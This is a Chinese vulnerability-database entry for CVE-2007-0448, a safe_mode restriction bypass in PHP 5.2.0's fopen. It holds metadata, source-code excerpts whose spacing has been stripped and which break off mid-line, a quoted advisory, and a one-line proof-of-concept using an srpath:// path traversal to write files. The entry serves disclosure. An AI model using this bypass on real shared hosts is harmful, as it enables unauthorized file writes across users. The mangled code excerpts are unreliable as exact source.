PHP fopen Safe_Mode绕过安全限制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112088 漏洞类型 代码注入
发布时间 2007-01-26 更新时间 2007-05-23
CVE编号 CVE-2007-0448 CNNVD-ID CNNVD-200705-489
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/29528
https://www.securityfocus.com/bid/22261
https://cxsecurity.com/issue/WLB-2007010090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-489
|漏洞详情
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHP对fopen的实现上存在漏洞,远程攻击者可能利用此漏洞使用写模式绕过safe_mode的安全限制。在fopen()函数中:--845-845---CodefromPHP520ext/standard/file.c[START]stream=php_stream_open_wrapper_ex(filename,mode,(use_include_path?USE_PATH:0)|ENFORCE_SAFE_MODE|REPORT_ERRORS,NULL,context);--845-845---CodefromPHP520ext/standard/file.c[END]在safe_mode.c文件中:--142-152---Codefrommain/safe_mode.c[START]ret=VCWD_STAT(path,&sb);if(ret<0){if((flags&CHECKUID_NO_ERRORS)==0){php_error_docref(NULLTSRMLS_CC,E_WARNING,"Unabletoaccess%s",filename);}return0;}duid=sb.st_uid;dgid=sb.st_gid;if(duid==php_getuid()){return1;--142-152---Codefrommain/safe_mode.c[END]如果duid==php_getuid()的话,就可以绕过safe_mode。#defineVCWD_STAT(path,buff)virtual_stat(path,buffTSRMLS_CC)在virtual_stat()函数中:--831-845---CodefromTSRM/tsrm_virtual_cwd.c[START]CWD_APIintvirtual_stat(constchar*path,structstat*bufTSRMLS_DC){cwd_statenew_state;intretval;CWD_STATE_COPY(&new_state,&CWDG(cwd));if(virtual_file_ex(&new_state,path,NULL,1)){return-1;}retval=stat(
|漏洞EXP
source: http://www.securityfocus.com/bid/22261/info

PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write files in unauthorized locations; other attacks may also be possible.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, all assuming that the 'safe_mode' restriction will isolate users from each other.

This issue is reported to affect PHP version 5.2.0; other versions may also be vulnerable. 

php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'
|受影响的产品
PHP PHP 5.2 + Debian Linux 4.0 sparc + Debian Linux 4.0 s/390 + Debian Linux 4.0 powerpc
|参考资料

来源:BID
名称:22261
链接:http://www.securityfocus.com/bid/22261
来源:SREASONRES
名称:20070125PHP5.2.0safe_modebypass(byWritingMode)
链接:http://securityreason.com/achievement_securityalert/44
来源:SREASON
名称:2175
链接:http://securityreason.com/securityalert/2175